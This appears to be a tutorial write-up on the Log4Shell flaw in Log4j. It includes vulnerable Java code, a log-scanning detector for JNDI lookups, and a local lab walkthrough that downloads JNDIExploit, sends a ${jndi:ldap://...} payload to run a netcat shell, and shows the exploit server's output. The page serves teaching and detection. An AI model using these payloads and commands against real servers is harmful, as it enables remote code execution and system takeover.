CVE-2021-44228 - Log4j
Why Log4j is so dangerous
CVE-2021-44228, also named Log4Shell or LogJam, is a Remote Code Execution (RCE) class vulnerability. If attackers manage to exploit it on a vulnerable server, they gain the ability to execute arbitrary code and potentially take full control of the system.
What makes CVE-2021-44228 especially dangerous is its ease of exploitation: even an inexperienced attacker can successfully exploit this vulnerability. According to the researchers, attackers only need to force the application to write a single attacker-controlled string to the log; the message lookup substitution feature then resolves that string and loads attacker-supplied code into the application.
Working Proofs of Concept (PoC) for the attacks via CVE-2021-44228 are already available on the Internet. Therefore, it’s not surprising that cybersecurity companies are already registering massive network scans for vulnerable applications as well as attacks on honeypots.
This vulnerability was discovered by Chen Zhaojun of Alibaba Cloud Security Team.
What is Apache Log4j and why is this library so popular?
Apache Log4j is part of the Apache Logging Project. By and large, usage of this library is one of the easiest ways to log errors, and that is why most Java developers use it.
Many large software companies and online services use the Log4j library, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and many more. Because the library is so popular, some information security researchers expect a significant increase in attacks on vulnerable servers over the next few days.
How does it work?
So, in a nutshell, the Log4j component processes the input being logged, and when it sees a JNDI lookup (a ${jndi:...} expression) in the message, it performs the lookup to fetch a Java object from the attacker-controlled LDAP (or DNS) server, loads it into the application runtime, and then the application runs the malicious code.
Exploit Requirements
- A server with a vulnerable log4j version (listed above),
- an endpoint with any protocol (HTTP, TCP, etc.) that allows an attacker to send the exploit string,
- and a log statement that logs out the string from that request.
Example of Vulnerable Code:
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import java.io.IOException;
import java.io.OutputStream;

public class VulnerableLog4jExampleHandler implements HttpHandler {

    static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());

    /**
     * A simple HTTP endpoint that reads the request's User Agent and logs it back.
     * This is basically pseudo-code to explain the vulnerability, and not a full example.
     * @param he HTTP Request Object
     */
    @Override
    public void handle(HttpExchange he) throws IOException {
        // com.sun.net.httpserver exposes request headers as a map; getFirst() returns null if absent.
        String userAgent = he.getRequestHeaders().getFirst("User-Agent");
        // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
        // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
        log.info("Request User Agent:{}", userAgent);
        String response = "Hello There, " + userAgent + "!";
        // Content-Length must be the byte count, not the character count.
        byte[] body = response.getBytes();
        he.sendResponseHeaders(200, body.length);
        OutputStream os = he.getResponseBody();
        os.write(body);
        os.close();
    }
}
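For the defender's side of the lookup described above, here is an added example (not code from the page or from any of the linked projects) that scans web-server log lines for ${jndi:...} lookups and pulls out the scheme, host, port and path of the attacker-controlled server, which is what an incident responder needs to block and hunt on. The sample log lines are constructed; the lookup strings inside them are the two that appear on this page.

```python
import re

# Case-insensitive match for a JNDI lookup in the form used on this page,
# e.g. ${jndi:ldap://10.29.22.169:1389/Basic/Command/...}. Named groups pull
# out the scheme (ldap, rmi, dns, ...), the attacker-controlled host, an
# optional port and the path that follows it.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//"
    r"(?P<host>[^\s:/}]+)(?::(?P<port>\d{1,5}))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)

def find_jndi_lookups(line):
    """Return one dict per JNDI lookup found in a single log line (empty if none)."""
    hits = []
    for m in JNDI_RE.finditer(line):
        hits.append({
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": int(m.group("port")) if m.group("port") else None,
            "path": m.group("path"),
            "raw": m.group(0),
        })
    return hits

def scan_log(lines):
    """Scan an iterable of log lines; return (line_number, hit) pairs, 1-based."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            findings.append((number, hit))
    return findings

# Constructed sample access-log lines (not from the page): a benign request, one
# carrying the exploit string from the page's curl command in the User-Agent
# field, and one using the ${jndi:ldap://attacker.com/a} form from the
# vulnerable-code comment, upper-cased to show the match is case-insensitive.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:01:22 +0000] "GET / HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:01:25 +0000] "GET / HTTP/1.1" 200 12 "-" '
    '"${jndi:ldap://10.29.22.169:1389/Basic/Command/nc -lnvp 5555 -e sh}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:30 +0000] "GET /api HTTP/1.1" 200 12 "-" '
    '"${JNDI:LDAP://attacker.com/a}"',
]

if __name__ == "__main__":
    for number, hit in scan_log(SAMPLE_LOG):
        print(f"line {number}: {hit['scheme']}://{hit['host']}:{hit['port']} {hit['path']!r}")
```

Because Log4j resolves the lookup before the message reaches the appender, the lookup string may never appear in the application's own log; run this over the reverse proxy or web-server access logs, which record the raw header.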
Reproducing Locally
If you want to reproduce this vulnerability locally, you can refer to christophetd's vulnerable app.
Run it in a terminal:
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
Exploitation steps
- Use JNDIExploit to spin up a malicious LDAP server
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i my-local-ip -p 8888
- Then, trigger the exploit using:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://10.29.22.169:1389/Basic/Command/nc -lnvp 5555 -e sh}'
- Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/nc -lnvp 5555 -e sh
[+] Paylaod: command
[+] Command: nc -lnvp 5555 -e sh
[+] Sending LDAP ResourceRef result for Basic/Command/nc -lnvp 5555 -e sh with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/nc -lnvp 5555 -e sh redirecting to http://10.29.22.169:8888/Exploitbh8DUI237i.class
[+] New HTTP Request From /172.17.0.2:50854 /Exploitbh8DUI237i.class
[+] Receive ClassRequest: Exploitbh8DUI237i.class
[+] Response Code: 200
Reverse Shell
To get a reverse shell, in another terminal type:
nc ip-docker-container port
Thanks
---
Sources:
https://github.com/christophetd/log4shell-vulnerable-app
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://www.randori.com/blog/cve-2021-44228/
https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j